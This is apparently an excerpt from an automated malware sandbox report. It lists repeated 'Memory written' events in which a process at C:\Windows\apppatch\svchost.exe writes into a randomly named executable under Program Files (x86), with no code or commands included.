Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 950000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 951000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 952000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 9A4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E40000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E41000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E42000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E94000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2AF0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2AF1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2AF2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2B44000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: C10000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: C11000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: C12000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: C64000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 6B0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 6B1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 6B2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 704000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2BF0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2BF1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2BF2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2C44000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2820000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2821000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2822000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2874000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D50000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D51000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D52000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DA4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: F40000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: F41000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: F42000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: F94000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2730000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2731000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2732000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2784000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D70000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D71000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D72000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DC4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1050000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1051000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1052000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 10A4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2910000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2911000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2912000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2964000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: EE0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: EE1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: EE2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: F34000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: B70000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: B71000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: B72000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: BC4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 3030000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 3031000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 3032000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 3084000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2860000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2861000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2862000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 28B4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2D90000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2D91000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2D92000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2DE4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DA0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DA1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DA2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DF4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 800000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 801000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 802000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 854000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: C00000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: C01000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: C02000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: C54000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2B70000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2B71000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2B72000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2BC4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 9D0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 9D1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 9D2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: A24000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2250000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2251000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2252000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 22A4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2BA0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2BA1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2BA2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2BF4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: FB0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: FB1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: FB2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1004000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2550000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2551000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2552000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 25A4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: F40000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: F41000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: F42000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: F94000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: F40000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: F41000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: F42000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: F94000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DB0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DB1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DB2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E04000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 7E0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 7E1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 7E2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 834000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DA0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DA1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DA2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DF4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1460000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1461000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1462000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 14B4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2900000	Jump to behavior
